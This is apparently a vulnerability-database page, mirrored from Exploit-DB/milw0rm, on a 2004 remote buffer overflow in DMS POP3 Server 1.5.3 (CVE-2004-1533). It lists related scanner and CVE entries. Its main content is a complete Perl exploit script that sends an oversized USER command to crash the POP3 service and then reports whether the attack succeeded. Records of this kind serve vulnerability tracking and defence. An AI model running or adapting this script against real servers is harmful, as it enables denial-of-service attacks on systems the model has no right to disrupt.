Lucene search
+L

DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow

🗓️ 21 Nov 2004 00:00:00Reported by Reed ArvinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

DMS POP3 Server 1.5.3 build 37 vulnerable to remote buffer overflow attacks.

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Digital Mappings Systems POP3 Server Remote Buffer Overflow
22 Nov 200400:00
nessus
Tenable Nessus
Digital Mappings Systems POP3 Server (pop3svr.exe) Multiple Field Remote Overflow
22 Nov 200400:00
nessus
CVE
CVE-2004-1533
19 Feb 200505:00
cve
Cvelist
CVE-2004-1533
19 Feb 200505:00
cvelist
EUVD
EUVD-2004-1527
7 Oct 202500:30
euvd
NVD
CVE-2004-1533
31 Dec 200405:00
nvd
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
#        DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => $ARGV[1],
				    Proto    => "TCP"))
{
	print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

	sleep(1);

	print $socket "USER " . "A" x 1023;

	close $socket;

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => $ARGV[1],
					    Proto    => "TCP"))
	{
		close $socket;

		print "failed!\n";
	}
	else
	{
		print "successful!\n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

# milw0rm.com [2004-11-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Apr 2016 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
EPSS0.07541
44